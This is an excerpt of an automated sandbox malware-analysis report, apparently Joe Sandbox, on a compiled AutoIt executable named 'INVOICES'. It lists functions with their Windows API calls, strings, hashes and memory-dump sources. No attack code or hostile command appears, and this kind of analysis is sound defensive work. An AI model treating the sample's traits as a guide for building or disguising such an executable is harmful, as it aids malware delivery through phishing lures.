                                                                                                                                  • Opcode Fuzzy Hash: 00e80476a5e5073b9037b2d454f48e1ab89f56956f111a4c1a20fce151968b44
                                                                                                                                  • Instruction Fuzzy Hash: 63518130940709EFDB21EFA8DD89F6EBBF5FF04704F008629E646A25A0D778A945CB50
                                                                                                                                  Function 007A5113 Relevance: 25.6, APIs: 17, Instructions: 110COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • LoadCursorW.USER32(00000000,00007F8A), ref: 007A5129
                                                                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 007A5134
                                                                                                                                  • LoadCursorW.USER32(00000000,00007F03), ref: 007A513F
                                                                                                                                  • LoadCursorW.USER32(00000000,00007F8B), ref: 007A514A
                                                                                                                                  • LoadCursorW.USER32(00000000,00007F01), ref: 007A5155
                                                                                                                                  • LoadCursorW.USER32(00000000,00007F81), ref: 007A5160
                                                                                                                                  • LoadCursorW.USER32(00000000,00007F88), ref: 007A516B
                                                                                                                                  • LoadCursorW.USER32(00000000,00007F80), ref: 007A5176
                                                                                                                                  • LoadCursorW.USER32(00000000,00007F86), ref: 007A5181
                                                                                                                                  • LoadCursorW.USER32(00000000,00007F83), ref: 007A518C
                                                                                                                                  • LoadCursorW.USER32(00000000,00007F85), ref: 007A5197
                                                                                                                                  • LoadCursorW.USER32(00000000,00007F82), ref: 007A51A2
                                                                                                                                  • LoadCursorW.USER32(00000000,00007F84), ref: 007A51AD
                                                                                                                                  • LoadCursorW.USER32(00000000,00007F04), ref: 007A51B8
                                                                                                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 007A51C3
                                                                                                                                  • LoadCursorW.USER32(00000000,00007F89), ref: 007A51CE
                                                                                                                                  • GetCursorInfo.USER32(?), ref: 007A51DE
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Cursor$Load$Info
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2577412497-0
                                                                                                                                  • Opcode ID: 68a00c456e729a8100947c814717a8171558e3c87d2c94dba6b3ebdb13a4bdf9
                                                                                                                                  • Instruction ID: ce9765b75f1fb7a1ede8da4af016cc8d22f2641d03f1c5f4cdef1dec94bdcaea
                                                                                                                                  • Opcode Fuzzy Hash: 68a00c456e729a8100947c814717a8171558e3c87d2c94dba6b3ebdb13a4bdf9
                                                                                                                                  • Instruction Fuzzy Hash: E33105B0D4831D6ADB209FB69C899AFBEE8FF44750F50452AE54DE7280DA7C6500CFA1
                                                                                                                                  Function 007BA1EB Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 007BA28B
                                                                                                                                  • DestroyWindow.USER32(?,?), ref: 007BA305
                                                                                                                                    • Part of subcall function 00737D2C: _memmove.LIBCMT ref: 00737D66
                                                                                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 007BA37F
                                                                                                                                  • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 007BA3A1
                                                                                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007BA3B4
                                                                                                                                  • DestroyWindow.USER32(00000000), ref: 007BA3D6
                                                                                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00730000,00000000), ref: 007BA40D
                                                                                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007BA426
                                                                                                                                  • GetDesktopWindow.USER32 ref: 007BA43F
                                                                                                                                  • GetWindowRect.USER32(00000000), ref: 007BA446
                                                                                                                                  • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 007BA45E
                                                                                                                                  • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 007BA476
                                                                                                                                    • Part of subcall function 007325DB: GetWindowLongW.USER32(?,000000EB), ref: 007325EC
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                                                                                  • String ID: 0$tooltips_class32
                                                                                                                                  • API String ID: 1297703922-3619404913
                                                                                                                                  • Opcode ID: 6342e307a04b586fe6a49c11d55c69602370d58224776156dc65afdbece40432
                                                                                                                                  • Instruction ID: d3404dbf35531385e7cdddaf54ab2ad8537f639d6f7bcf83740dcba5f5a1c37b
                                                                                                                                  • Opcode Fuzzy Hash: 6342e307a04b586fe6a49c11d55c69602370d58224776156dc65afdbece40432
                                                                                                                                  • Instruction Fuzzy Hash: 3471AE71150684AFD720DF28DC49FA67BE5FB88704F04862DF986872A1D779E902CF26
                                                                                                                                  Function 007B43FB Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CharUpperBuffW.USER32(?,?), ref: 007B448D
                                                                                                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 007B44D8
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BuffCharMessageSendUpper
                                                                                                                                  • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                  • API String ID: 3974292440-4258414348
                                                                                                                                  • Opcode ID: 60bb3f2752b20b8c79f8c112fc85055576367760085bb4445853ac07088863d6
                                                                                                                                  • Instruction ID: 7c5cc50904d091c770d18bb8f47c3bc80fa5e82f9e0978b66f9c9d3b001c4784
                                                                                                                                  • Opcode Fuzzy Hash: 60bb3f2752b20b8c79f8c112fc85055576367760085bb4445853ac07088863d6
                                                                                                                                  • Instruction Fuzzy Hash: 63919E74204701DFDB14EF24C895BA9B7A1AF89314F04856CF9965B3A3CB78ED0ACB91
                                                                                                                                  Function 007BB832 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 007BB8E8
                                                                                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,007B91F4), ref: 007BB944
                                                                                                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 007BB97D
                                                                                                                                  • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 007BB9C0
                                                                                                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 007BB9F7
                                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 007BBA03
                                                                                                                                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 007BBA13
                                                                                                                                  • DestroyCursor.USER32(?), ref: 007BBA22
                                                                                                                                  • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 007BBA3F
                                                                                                                                  • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 007BBA4B
                                                                                                                                    • Part of subcall function 0075307D: __wcsicmp_l.LIBCMT ref: 00753106
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Load$Image$LibraryMessageSend$CursorDestroyExtractFreeIcon__wcsicmp_l
                                                                                                                                  • String ID: .dll$.exe$.icl
                                                                                                                                  • API String ID: 3907162815-1154884017
                                                                                                                                  • Opcode ID: 4d4d55f0a75fa9490ffdf768d8b8eaf581cfcb1a66e6aa268c7fdf4b7c1cc9c1
                                                                                                                                  • Instruction ID: 2b21b751fc179af59bef593ed69cfa3345d716e2ced5f4c4925f1b7ed7f9c2a0
                                                                                                                                  • Opcode Fuzzy Hash: 4d4d55f0a75fa9490ffdf768d8b8eaf581cfcb1a66e6aa268c7fdf4b7c1cc9c1
                                                                                                                                  • Instruction Fuzzy Hash: 9E61BDB1A00619FAEB14DF64CC45FFE77A8EB08B11F108215FD15D61D1DBB8A985CBA0
                                                                                                                                  Function 0079A3DC Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00739997: __itow.LIBCMT ref: 007399C2
                                                                                                                                    • Part of subcall function 00739997: __swprintf.LIBCMT ref: 00739A0C
                                                                                                                                  • CharLowerBuffW.USER32(?,?), ref: 0079A455
                                                                                                                                  • GetDriveTypeW.KERNEL32 ref: 0079A4A2
                                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0079A4EA
                                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0079A521
                                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0079A54F
                                                                                                                                    • Part of subcall function 00737D2C: _memmove.LIBCMT ref: 00737D66
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                                                                                  • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                  • API String ID: 2698844021-4113822522
                                                                                                                                  • Opcode ID: 6cc4db60bb164f01b4767a6935c910ad779ec786f7b134d5fcaa5d2ce1a312cc
                                                                                                                                  • Instruction ID: 33f0be2add6de18608b1c4519de2af54cf00735432f6072f09b6b752289e0da4
                                                                                                                                  • Opcode Fuzzy Hash: 6cc4db60bb164f01b4767a6935c910ad779ec786f7b134d5fcaa5d2ce1a312cc
                                                                                                                                  • Instruction Fuzzy Hash: CC519EB1104304DFD710EF24C89596AB7E4FF88718F00896CF88957262DB39EE09CB92
                                                                                                                                  Function 007BBA67 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,007B9239,?,?), ref: 007BBA8A
                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,007B9239,?,?,00000000,?), ref: 007BBAA1
                                                                                                                                  • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,007B9239,?,?,00000000,?), ref: 007BBAAC
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,007B9239,?,?,00000000,?), ref: 007BBAB9
                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 007BBAC2
                                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,007B9239,?,?,00000000,?), ref: 007BBAD1
                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 007BBADA
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,007B9239,?,?,00000000,?), ref: 007BBAE1
                                                                                                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 007BBAF2
                                                                                                                                  • OleLoadPicture.OLEAUT32(?,00000000,00000000,007C2CAC,?), ref: 007BBB0B
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 007BBB1B
                                                                                                                                  • GetObjectW.GDI32(00000000,00000018,?), ref: 007BBB3F
                                                                                                                                  • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 007BBB6A
                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 007BBB92
                                                                                                                                  • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 007BBBA8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3840717409-0
                                                                                                                                  • Opcode ID: 1f3ce5ed4f43b702eae3e9b05a448a423b3a43655e293143d0738c8705336230
                                                                                                                                  • Instruction ID: 52e500c1cb718fe68508ec65f2b1b0462f3f94821894990bb8d4b3a6900524c4
                                                                                                                                  • Opcode Fuzzy Hash: 1f3ce5ed4f43b702eae3e9b05a448a423b3a43655e293143d0738c8705336230
                                                                                                                                  • Instruction Fuzzy Hash: 46411575600209AFDB219F69DC88FAB7BB8FB89B11F108168F909D7260D7789901DB64
                                                                                                                                  Function 0079D925 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __wsplitpath.LIBCMT ref: 0079DA9C
                                                                                                                                  • _wcscat.LIBCMT ref: 0079DAB4
                                                                                                                                  • _wcscat.LIBCMT ref: 0079DAC6
                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0079DADB
                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 0079DAEF
                                                                                                                                  • GetFileAttributesW.KERNEL32(?), ref: 0079DB07
                                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 0079DB21
                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 0079DB33
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                                                                  • String ID: *.*
                                                                                                                                  • API String ID: 34673085-438819550
                                                                                                                                  • Opcode ID: 16bfb2f272aac6c7ea366111235b52bfe299c573f463b2b3b50d0385cfe5e998
                                                                                                                                  • Instruction ID: c2dd77febaa26f251450ef1b852c310066333e8048196d31bd6551038940adde
                                                                                                                                  • Opcode Fuzzy Hash: 16bfb2f272aac6c7ea366111235b52bfe299c573f463b2b3b50d0385cfe5e998
                                                                                                                                  • Instruction Fuzzy Hash: 2E8191B25082409FCF34EF64D8449AAB7E8FF89310F18882EF985D7251E678ED44CB52
                                                                                                                                  Function 007A742F Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetDC.USER32(00000000), ref: 007A74A4
                                                                                                                                  • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 007A74B0
                                                                                                                                  • CreateCompatibleDC.GDI32(?), ref: 007A74BC
                                                                                                                                  • SelectObject.GDI32(00000000,?), ref: 007A74C9
                                                                                                                                  • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 007A751D
                                                                                                                                  • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 007A7559
                                                                                                                                  • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 007A757D
                                                                                                                                  • SelectObject.GDI32(00000006,?), ref: 007A7585
                                                                                                                                  • DeleteObject.GDI32(?), ref: 007A758E
                                                                                                                                  • DeleteDC.GDI32(00000006), ref: 007A7595
                                                                                                                                  • ReleaseDC.USER32(00000000,?), ref: 007A75A0
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                  • String ID: (
                                                                                                                                  • API String ID: 2598888154-3887548279
                                                                                                                                  • Opcode ID: 258c6b20b3a5bd49eb74b4a12450df38f5aca17a2879e0b521542b33f3822820
                                                                                                                                  • Instruction ID: 4f415097850509288159600bb8bf6a24335fb3d0d3eff7278093a813f2cebfc9
                                                                                                                                  • Opcode Fuzzy Hash: 258c6b20b3a5bd49eb74b4a12450df38f5aca17a2879e0b521542b33f3822820
                                                                                                                                  • Instruction Fuzzy Hash: 21515A71904209EFCB15CFA8CC85EAEBBB9EF89710F14C62DF94997221D735A940CB64
                                                                                                                                  Function 00736BEC Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00750AD7: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00736C6C,?,00008000), ref: 00750AF3
                                                                                                                                    • Part of subcall function 007348AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007348A1,?,?,007337C0,?), ref: 007348CE
                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00736D0D
                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00736E5A
                                                                                                                                    • Part of subcall function 007359CD: _wcscpy.LIBCMT ref: 00735A05
                                                                                                                                    • Part of subcall function 007537BD: _iswctype.LIBCMT ref: 007537C5
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                                                                                  • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                                                                  • API String ID: 537147316-1018226102
                                                                                                                                  • Opcode ID: ed81f5902d30e59d8e8e86827a57cc342f716588edf5ec5771e42b4dc4dc4deb
                                                                                                                                  • Instruction ID: 014faffd3c9288e308cce9cbac320be840c87934107551aa231aa9aea5500f90
                                                                                                                                  • Opcode Fuzzy Hash: ed81f5902d30e59d8e8e86827a57cc342f716588edf5ec5771e42b4dc4dc4deb
                                                                                                                                  • Instruction Fuzzy Hash: C502A070108341DFD724EF24C885AAFBBE5BF99314F04491DF886972A2DB38E949CB52
                                                                                                                                  Function 007345DF Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 007345F9
                                                                                                                                  • GetMenuItemCount.USER32(007F5890), ref: 0076D6FD
                                                                                                                                  • GetMenuItemCount.USER32(007F5890), ref: 0076D7AD
                                                                                                                                  • GetCursorPos.USER32(?), ref: 0076D7F1
                                                                                                                                  • SetForegroundWindow.USER32(00000000), ref: 0076D7FA
                                                                                                                                  • TrackPopupMenuEx.USER32(007F5890,00000000,?,00000000,00000000,00000000), ref: 0076D80D
                                                                                                                                  • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0076D819
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2751501086-0
